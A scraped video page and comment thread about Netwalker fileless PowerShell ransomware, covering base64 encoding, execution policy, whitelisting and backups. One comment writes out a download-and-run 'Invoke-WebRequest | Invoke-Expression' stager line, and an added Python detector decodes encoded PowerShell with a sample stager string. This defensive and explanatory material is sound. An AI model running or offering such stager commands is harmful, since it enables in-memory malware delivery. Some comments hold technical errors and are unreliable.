Fileless Ransomware: Powershell Netwalker
- Published: 19 Nov 2022
- Netwalker: The fileless ransomware can encrypt your data without any exe file or trace, just a string of characters as a powershell command. www.acronis.com/en-us/product... (Get Acronis with exclusive 30% sponsor discount)
Buy the best antivirus: thepcsecuritychannel.com/best...
Join the discussion on Discord: discord.tpsc.tech/
Get your business endpoints tested by us: tpsc.tech/
Contact us for business: thepcsecuritychannel.com/contact - Science
Good to see ransomware authors making their code tiny and efficient. Now if only Windows devs could follow suit.
Maybe the Windows team needs some lessons on MISS (Make it simple, stupid). I don't see any "put bloatware" in MISS now, do I?
@@RaskaTheFurry They make it stupid alright.
AHHAHAHAHAHAHHAHA........
¦:¬|
Ransomware payloads are usually very small to avoid detection and ensure execution. Furthermore, you want as FEW dependencies as possible. This is especially important when you are running ransomware through an interpreted language like PowerShell. Normal developers don't have to worry about antivirus and dependencies; they can have as many dependencies as they want (which makes large projects easier to write and more powerful) because they usually have installers. Malware very rarely has an installer, and if it is an installer it is pretty much just a stager/loader which loads a new stage or malicious process to avoid initial detection.
Microsoft can only optimize tracking your activity and using information for advertisement.
I'm about as computer literate as a floppy disk, but I like watching your channel to see what crazy stuff hackers come up with nowadays.
Not knowing is better sometimes.
I can't code yet but I imagine it's kinda like chemistry for some... As lots of people simply couldn't trust themselves with their new talents 😂.
This is very well explained.
This is not fileless. If it's a PowerShell script, that's a file. If it's browser JS, it is still a file your browser downloaded. If it is an Office macro, it is still a file.
File-less means either (or both) remote code execution and persistence on the network without files. The latter is only extremely advanced APT...
I could accept browser js as file-less as it is code execution and sandbox escape without explicit interaction from the user, even though the files are written to cache if anything, but a powershell script not. The files are there, embedded as base64.
The fileless part is the malicious payload itself. It does generally need a file to be started, as you have said, which is correct, but after that everything malicious is in memory only, as PowerShell will decode the Base64 string and decode whatever else the attackers encoded the payload with. It is even possible to just skip all of that encoding and embed a URL to download the payload from; then there is absolutely nothing related to the malicious payload stored on disk. Invoke-WebRequest will download all of the malicious PowerShell code and save it in memory in a PowerShell variable, then Invoke-Expression will start interpreting that in-memory data. If you were looking at the initial payload, all you would see is one very small command that runs Invoke-WebRequest and pipes it into Invoke-Expression, but everything it's doing would be run in memory with PowerShell. It would look something like this:
Invoke-WebRequest -Uri "somestrangewebsite.com/my-payload.ps1" | Invoke-Expression
And you can obfuscate that however you would like.
@@IWickDev In these cases, AMSI and products with memory scanning ability will be able to detect the malicious code/behavior in memory.
@@IWickDev The encoded payload in this case seems to be a DLL, which is then injected into explorer. Pretty classic malware behavior, just wrapped in a script, which plays the role of a PE packer.
@@JohnDoe-ln8jp I see, that makes more sense.
@@IndronilAnik That's what we hope to see moving forward.
It's actually a Base64 encoded string of commands, not "encrypted". Anyone with the source code can decode and get exactly what command it executes.
Yep, I was like... why not just decode it, it's just base64.
One of the first things I do when configuring PCs (for 10 years now) is applying an SRP, aka a whitelist, with GPO (after finishing the image). The whitelist blocks probably 99% of threats even without AV software. It's very easy to configure and a basic protection against all kinds of stuff.
We use monitoring tools at work that will alert us if a PowerShell command is run with any form of encrypted code, so if needed I assume we could also block those scripts as well. I did notice that it looks like the encrypted text is in base64 @0:58, so it should be possible to decode the string it encrypted (would be nice to get the full string and see what it is doing in the background; it might actually be downloading and then running an actual binary that's the malware).
what tool do you use?
@@c-LAW We use a variety of tools: Cisco AMP and Symantec Endpoint for client protection, Varonis and Stealthwatch for, I think, patterns on the network (a large amount of files deleted/modified/encrypted at once, or a lot of SMB traffic to many external hosts), with pretty much everything funneling alerts to LogRhythm and email.
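The in-memory download-and-run pattern described in the reply above and the alerting on encoded PowerShell commands mentioned in this thread can both be checked with a small detection pass. This added example is not from the video or any commenter: it parses constructed 4688-style process-creation records (assumed `CommandLine=` field), decodes any `-EncodedCommand` argument (base64 of UTF-16LE text, so encoded rather than encrypted) and reports the indicators a SOC rule would alert on; the sample records and the reserved `example.invalid` host are constructed.

```python
"""Flag PowerShell command lines that decode or fetch payloads in memory.

Added example, not from the video or the thread: a minimal detection pass
over constructed process-creation records (assumed 'CommandLine=' field).
"""
import base64
import re

# Indicators of in-memory execution; each maps a rule name to a pattern.
SUSPICIOUS = {
    "invoke-expression": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I),
    "web-download": re.compile(
        r"\b(?:Invoke-WebRequest|iwr)\b|DownloadString|Net\.WebClient", re.I),
    "inline-base64-decode": re.compile(r"FromBase64String", re.I),
    "hidden-window": re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "executionpolicy-bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    # base64 of a PE header ('MZ') always starts with 'TVq'; kept case-sensitive
    "base64-pe-header": re.compile(r"\bTVq"),
}
# -EncodedCommand and its short forms, followed by a base64 blob.
ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CMDLINE = re.compile(r"CommandLine=(.*)$")


def decode_encoded_command(cmdline):
    """Return the text behind -EncodedCommand, or None if absent/undecodable.

    PowerShell expects base64 of UTF-16LE text, which is why these blobs are
    long and why they decode straight back to script: encoded, not encrypted.
    """
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Return the sorted indicator names found in one command line.

    Both the visible text and the decoded -EncodedCommand payload are scanned,
    so a stager hidden in base64 is judged by what it actually runs.
    """
    hits = set()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.add("encoded-command")
    for text in (cmdline, decoded or ""):
        for name, pattern in SUSPICIOUS.items():
            if pattern.search(text):
                hits.add(name)
    return sorted(hits)


def scan_log(records):
    """Return [(record_number, findings)] for records with any indicator."""
    alerts = []
    for n, rec in enumerate(records, 1):
        m = CMDLINE.search(rec)
        if m:
            findings = analyze(m.group(1))
            if findings:
                alerts.append((n, findings))
    return alerts


# Constructed sample telemetry (not real logs). The stager mirrors the
# iwr | iex one-liner discussed above; the host is a reserved .invalid name.
SAMPLE_STAGER = 'Invoke-WebRequest -Uri "http://example.invalid/p.ps1" | Invoke-Expression'
SAMPLE_ENC = base64.b64encode(SAMPLE_STAGER.encode("utf-16le")).decode("ascii")
SAMPLE_LOG = [
    "EventID=4688 Image=C:\\Windows\\explorer.exe CommandLine=explorer.exe",
    "EventID=4688 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -NoProfile -w hidden -enc " + SAMPLE_ENC,
    "EventID=4688 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -ep bypass -c \"iex([Text.Encoding]::ASCII.GetString("
    "[Convert]::FromBase64String('TVqQAAMAAAAEAAAA')))\"",
    "EventID=4688 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -File C:\\Scripts\\Backup.ps1",
]

if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG):
        print(f"record {n}: {', '.join(findings)}")
```

Records 2 and 3 fire; the signed-script launch in record 4 and explorer.exe do not, which is the distinction an alert rule on "encoded or in-memory PowerShell" needs to preserve.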
Hi Leo, with this type of fileless malware attack I've seen a file just seem to drop onto the computer without me activating anything, and I'm wondering how this is possible, and besides antivirus protection, what other types of protection can we take into account? Is Sandboxie effective against this type of attack?
When Microsoft announced Windows 10 S, today S-mode, they bragged that no known ransomware can infect it. Most only talk about it being limited to Windows Store apps. There is little coverage of S-mode, but one of its features is that it also blocks PowerShell, cmd.exe, and more from running.
Alright, this is actually scary. Because of this my browser java is off by default for years.
Questions
Pages like Wiki have many links. Do they get checked? Is there a filter installed before someone saves the edit?
Could you make a video on how to disable powershell scripts safely for the standard user , Admin, and Super Admin please?
Using AppLocker or WDAC to disallow powershell.exe from running is arguably one of the most efficient ways to prevent PowerShell scripts from running.
If you are an IT admin for a company, you can actually also deploy a policy to enforce the execution policy for PowerShell scripts as "AllSigned", but it's not bulletproof. If a hacker finds a sneaky way to digitally sign their .ps1 files, then they could potentially bypass it, though it's unlikely they would sign them.
One last note: a lot of installers/upgraders today utilize PowerShell scripts as part of their routine, and not everyone is good at signing them. So if you decide to completely disable PowerShell scripts, you might run into some issues when you try to install or upgrade your existing applications.
You say at the end that this kind of ransomware can be detected by your sponsor Acronis, but at 3:00, we can see that Acronis has it as undetected. So, will Acronis protect against this? And I'm not talking about the backup protection Acronis can do, but the malware detection part.
Also, we have Norton on our system and it says that Symantec does detect it, I guess they are one and the same? Lastly, is there any reason not to disable powershell command on regular user computer? Thanks!
A bit irrelevant to the subject in the video, but is there a product that offers something like a "counter-strike" capability? Where an AV could web-crawl like viruses do and perform "reconnaissance" or "precision strikes" on their known vectors?
Thank you
I think in Malwarebytes you could configure script blocking?... I remember Leo tried it in the Malwarebytes video, I'm not sure if that can help in this type of ransomware
To protect yourself against this type of script without disabling PowerShell, you could allow ONLY signed PS scripts in your environment.
This channel is underrated
What I want to know is if it is encrypted how does the OS execute it? Base64 is a hash not an encryption so it can be reversed and analyzed. I do also wonder why it doesn't get stopped by the execution policy of the OS? By default script execution is disabled in powershell so only typed commands work. I know you can get around it by using the rubber ducky USB but that is unlikely a method that is often used.
If you can trick a user into opening powershell and pasting it in, that'll work without that warning, same if a batch file runs that sadly.
Hi there, I was wondering if it's possible for ransomware or any malware to infect a NAS on a network where a shared drive is NOT connected on an infected computer. For example, if I have a Synology NAS on a network with a computer that is infected on the same network, HOWEVER there are NO shared drives connected to it at all and it is only used to surf the internet, can the NAS still be infected by some other means (perhaps a vulnerability within DSM?)
If the ransomware is programmed to move laterally using known exploits yes it can also be encrypted - more importantly though, if the shares aren't authenticated then it's just a simple network sweep for smb shares, mount then encrypt - very basic code.
I'm sorry, but why do you say that the string is encrypted? It's a Base64 encoded string, but it's not encrypted. You can just use any Base64 decoder to actually read its contents, meaning that you can absolutely read the ransomware's source code.
I'd like to see how you protect against this. Is Group Policy to block PowerShell enough?
I just realised that I may have a (mostly) ransomware-proof network storage drive.
If I delete or overwrite a file on it, the file is not deleted but moved to a recycle bin (and access to the recycle bin can be easily restricted).
My PC was infected by ransomware that generates .mkp files ... fortunately my data is OK because i had a backup and changed the infected hard drive with an SSD... I still have all the encrypted files on the old hard drive hoping that there is a decryptor tool for the mkp ransomware ... has anyone any knowledge of such tool?
👍Thanks.
FYI: fileless virus resides in memory like RAM.
LOL, since when are encrypting and encoding the same thing? The PowerShell script takes that BASE64 string, decodes it to ASCII and then runs it.
I'm a total newbie so take it into account, but how can you "contract" such malware? I get that you don't directly download this but it sort of downloads in the background to your cache (i think) but what prompts that? Just visiting a shady website? Interacting with an element on such website? What can I do to stay safe from those sorts of things?
Pencil. Paper. Paranoia. Just kidding. Education, only using software from trusted sources, making (and testing!) backups and a fully tested system recovery process. Take a new backup before any system updates, new software installs, etc. My final solution was to just run Windows in a guest virtual machine (in my case - VirtualBox running on Linux Mint) and take snapshots of the VM which I can "roll back" in time. The one I use to access my company VPN gets rolled back after every use. If software updates are required for it, I take a new snapshot after applying them. It's worked OK so far. BTW, the files that comprise the Windows guest get backed up by ZFS snapshots and copied to my NAS using 'zfs send'.
Chris Titus has a PowerShell command, and after I used it, after a while my Bitdefender Total Security detected some unusual activity, something like a potentially unwanted app that I couldn't find anywhere to uninstall.
And Bitdefender also couldn't find it even when I selected "remove" from the choices. It was weird.
Can you make a video about cache viruses? I got a virus one time where the website cached a malicious file then auto-reloaded in order for my browser to load the cached file; luckily my AV deleted it before it ran.
I always run my browser and email client sandboxed (Sandboxie-Plus), and delete the sandboxes at day's end. So far, I have avoided getting infected by any nasties. Not computer literate enough to know if sandboxing is any good against the type of ransomware discussed in this video. I also use Windows Defender, and lately, the free version of Avast One.
I don't get how this would work, when PowerShell by default disables automatically running PowerShell scripts?
On a different note that outro background is sick, where can i get it
Is acronis still good choice? Can you provide updated test?
"This script file is a fileless ransomware" lol
What about scripts such as Python .py? Can I scan them?
Where can I download the file to check it out? Thanks for the video.
Did the Acronis software block Netwalker? Great video! Thanks for posting!
nah acronis is garbage. if you need cloning/back up software, get macrium reflect
Does it also do privilege escalation?
Can crowdstrike edr detect this?
Please test Trend Micro Maximum Security 2022. It's been a long time since this product was tested by your channel. Anyway, thank you for making such informative content. Looking forward to seeing more videos.
Salutations and Greetings,
Detection rate and removal of malware for Acronis Cyber Protect Home Office.
Is it really that good, or would you suggest something else :)?
Always the best,
Trend Micro started to screw up my Windows File Explorer and Boxcryptor over the past 12 months and so I’ve uninstalled it and am now using Windows Defender. I’m not happy about that, but at least it gives me back a usable PC that I only just 2 years ago.
Well TrendMicro is shitty.
Set-ExecutionPolicy Restricted
This is what I was talking about towards the end.
@@axq3837 Bypass will eliminate all warning messages. Not advised, but not the worst thing in the world either.
A lot wrong about terminology used here. The payload is not encrypted, it is encoded, which will fail against most modern AV. Also this is not fileless malware, it is in a .ps1 file. Powershell "fileless malware" is usually delivered using invoke-webrequest to download the file from a web server, load it into memory and then execute it, in this case the script is stored on the hard disk.
Also, I am pretty sure you can inspect the child processes of explorer.exe (threads) and see malicious threads created, which is what happens during process injection.
Good Video 🔥🔥
AV-Comparatives, one of the world’s foremost antivirus testing organizations based in Austria, conducted a performance test in April 2022 that compared 17 international antivirus brands and ranked them based on their impact on device performance. K7 Antivirus emerged as the winner in the test with an impact score of just 1.6, establishing that K7’s antivirus has the least impact on device performance.
Re mitigation, is it possible to only allow pwsh scripts to run under Administrator accounts? Via Group Policy or something?
It's already done, by Windows, by default. The execution policy on default installation would not allow this to run, admin or not. To change it one HAS to launch PS as admin and do Set-ExecutionPolicy command with appropriate parameters. To make this run on your machine would take more social engineering than the code.
You can check my words by running Get-ExecutionPolicy PS command on your system to see that it is RemoteSigned by default, and this script should be treated as remote.
When you say it encrypts all the files you have access to does that include file shares you have access to?
If those shares are writeable by you, then yes. Indications are that these cryptolocker malware apps hang out for a while to get the lay of the land to maximize the impact when they finally activate. I really hate kidnappers/extortionists.
I wonder if this Malware can spread onto a Cloud Drive that is linked to the PC, Such as OneDrive that can then spread to every PC it is linked to.
I do know some AV can scan Cloud Drives meaning that software can see, read and write to that drive, so some Malware (Malicious Software) can do the same.
This means that a Single File (or file-less) can infect not just your system but anything that the cloud drives are connected to....
Sometimes, I wish we went back to Books hah, the world is terrifying now.
@@thephoenixking1086 definitely not but there has been some pretty cool exploits related to the cloud
How is this malware distributed?
How can you avoid even downloading it?
Because of this my browser Java is off by default for years. It's only active when I say so. Also, before you click any link, the browser highlights the link address. If there is a weird chain like in the video, it's better not to click. Serious and not-hacked pages don't have such long links.
NetWalker used to be a broad-ranging ransomware operation involving COVID-related phishing against specific corporate networks, government agencies and users alike, but since May 2020 BleepingComputer documents that it adopted a RaaS model involving exclusively targeted attacks on corporate networks by recruiting affiliates (in particular in critical sectors like healthcare).
Requiring admin signed PowerShell scripts helps.
Could you make a video about UEFI malware, how UEFI gets infected and how to defend against it?
@@axq3837 Can a bios image get infected through the OS?
@@axq3837 I have noticed this, but I also have used some PCs that don't use an exe rather requires going into the bios to upload the image via USB. Would that and a bios pw matter in this case?
@@axq3837 Thanks for the answers
Says it is encrypted, when it is basically just base64 encoded 💀
Hey dude, can you make a video on Mac security, and Mac malware?
Yeah but what antivirus should you have for this situation, is it gonna work in the free version?
Also is Windows defender is enough for situations like these?
Um, no
but that long string command going far beyond the edge of the screen is not suspicious at all?...
So the only way to execute PowerShell malware is to right-click and run it? As you can't execute PowerShell with regular double clicks.
That doesn't make sense; no one randomly right-clicks and runs a PowerShell script out of nowhere.
It can be loaded straight into memory through a second file. First file loads instruction to make a web request, read it and load it into memory. If AMSI protection doesn't catch it and it can bypass smartscreen then AV can't stop it.
just one thing javascript in the browser can't inject a dll into some other process unless a super major bug is found...
Pretty sure he meant Java.
Would this also work on Linux?
I don't think so since this uses PowerShell (which if I remember rightly is Windows only).
Though there most likely are thousands of Linux versions of this; there is so much malware in existence that there is bound to be something like this for Linux, Mac-OS, Android and everything else in existence.
I'm surprised little me didn't accidentally get everything on the computer my grandma let me use since I accidentally went to risky websites looking for cartoons and games to play lol
We tried supporting you with *TPSC22. Unfortunately it does not work.*
Thank you for all your hard work and time. Your info is priceless.
Will contact Acronis about it. If you use the link, it still counts!
@@pcsecuritychannel Thank you, however, we'll just send you a donation instead. Direct and more to the point. 🙏
I mean ps1 is a file right ?
After a few hours of watching horrifying videos on your channel, the Moral of the Story is: OpenBSD for Life! :)
Many antivirus products will probably detect these PowerShell expressions which will call malicious behaviours, but to be more protected, I would advise Comodo Free Firewall HIPS protection to be used with the existing antivirus product on our PCs. Even if the antivirus product fails to detect this malicious PowerShell code, Comodo Free Firewall HIPS protection would warn you about ".ps1" file execution, and if a user is cautious enough and has basic knowledge about PCs, he/she would deny that action and would be protected from this attack. Layers of protection are always better than having only one protection software installed on our PCs, in my opinion.
I use Comodo Free and recently denied a PowerShell script to run out of nowhere on a Windows 10 desktop. Was not installing/uninstalling. Only knew to deny by watching this channel. Comodo said it was a safe application, so yeah. Thanks PC Security/Leo
Comodo Free Firewall from the looks on their own forums hasn't been updated since 2021, or even updated for Windows 11. A ton of users complaining and all their staff say is an update will be available "soon". From what I'm reading online, it seems the company is on life support at this point.
It's Base64, it's not encrypted it's encoded there's a difference.
Can it be used as a dead man switch to protect your own files?
In theory if you had the tools to unprotect them as well then possibly. I'd say to just use BitLocker though (drive encryption, when shut down the encryption key is lost).
Thank you
@@SmilerRyanYT The issue with this, which I had myself is that the drive will ONLY work in that PC it was Encrypted with. BitLocker basically killed my drive working in any other device, when I plugged it in and booted the PC it caused the PC to crash, when I was able to put the Key in it just BSOD the system, This happened with ANY PC I tried (and via a USB Adapter).
Only when plugged back into the original system did it work as if nothing happened, meaning if you Encrypt with BitLocker and that system fails/dies, your Data is GONE and will be a very VERY hard time getting it back, if not impossible. I recommend only using BitLocker on a system you know won't fail any time soon, try to find some software that does the same thing but allows your data to be used on another system (with the key etc.).
@@thephoenixking1086 That seems rather strange, BitLocker usually has portability in mind.
Every time you say "VirusTotal", I hear "Bar Stool"....I may have to cut down on my drinking!
wow
can you test it against norton security?
It is detected by 31 vendors on VirusTotal; here is the full list in alphabetical order:
Ad-Aware
AhnLab-V3
ALYac
Antiy-AVL
Avast
AVG
BitDefender
Comodo
DrWeb
Emsisoft
eScan
ESET-NOD32
Fortinet
GData
Google
Ikarus
Kaspersky
Lionic
MAX
McAfee
McAfee-GW-Edition
Microsoft
QuickHeal
Sophos
Symantec
Trellix (FireEye)
TrendMicro
TrendMicro-HouseCall
VIPRE
VirIT
ZoneAlarm by Check Point
I disable scripts in PowerShell
sound app control products will block unapproved PS1s from executing...
Yeah, so blaming PowerShell is meaningless. 1) That was a PS file and it would be caught. 2) As you pointed out, the concept applies to any running process (i.e. your browser), and a browser is the more legit threat. 3) Any malware that can't catch changes to a large quantity of files is not effective malware and is mostly useless. 4) If in-memory DLL creation doesn't trigger malware, again, the malware is mostly useless. 5) Simple backups would resolve that problem.
For me, Base64 is not encryption method.
Why are you calling a base64 encoded string, cipher text? Aka, "it's encrypted", 0:46
Interestingly, if you check later in the video at 4:16 the website that he refers to also calls it encrypted, but then also mentions that the string is base64 encoded. My best guess is that the string was encrypted before it was turned into base64, but that also means that it has to be able to decrypt it in order to run it as a PowerShell script. I guess it could do it by requesting a decryption key through a http call or something like that.
I'm throwing out my computers
Do an actual review of Acronis.
Isn't all that gibberish just encrypted with Base64? It says it right there at the beginning of that command!
I thought the same thing, I guess it is possible that there is some sort of encryption hiding behind the base64 encoding though, although the encryption method and key is probably there too then, unless it gets it via the web. Here's an "encrypted" message for you: SSdtIGEgZGFuZ2Vyb3VzIGhhY2tlcg==
@@chralexNET I was also curious so I downloaded the file and had a look. I couldn't be bothered to spend too long looking but it's just really heavily obfuscated powershell stuff. Looks like it might drop a couple more files or something. It's definitely not encrypted tho
@@spluad Good to know, thank you!
Those authors of ransomware are clever at this. Ransomware shouldn't be a thing in anything; I'm sure if it never made money they'd stop doing that.
How come you never tested the Netwalker Powershell Script against Acronis to see what would happen?
cause acronis is shit, never use that garbage
lol u used Jurassic Park Photos
Erm, that's a file.... Feels like a bad example of fileless 😂
Discord users beware...
1. javascript code ? 🤣🤨 not true
2. A Macro ? You realize that Microsoft disabled it by def for this exact reason a while ago ? no ?
this isn't what fileless is about bro
first
BOOOOO, you did not use Webroot Antivirus Protection or Avira Antivirus
1st comment
🤡
first comment
Fileless ransomware. Now that's something that would never happen on GNU/Linux 😆
Linux and so on have the same issues as Mac-OS and Windows; they are ALL vulnerable and can be infected. The only reason Windows is more prone to attacks is the fact that like 95% of ALL computer users use a form of Windows, so hacking that remaining 5% is not worth it, but that does not at all mean that these hacks do not happen.
If you realise that someone you want to attack has something you want and they are using Linux, you are going to make software that can hack into this, which happens a LOT more than people realise, BANKS for example sometimes use a form of Linux for their servers, proving Linux gets attacked.
My advice is sell your PC and go back to reading books hah, now that is safe lol.
@@thephoenixking1086 not sure if you're trolling or not. I made a joke about how everything is a "file" on Linux.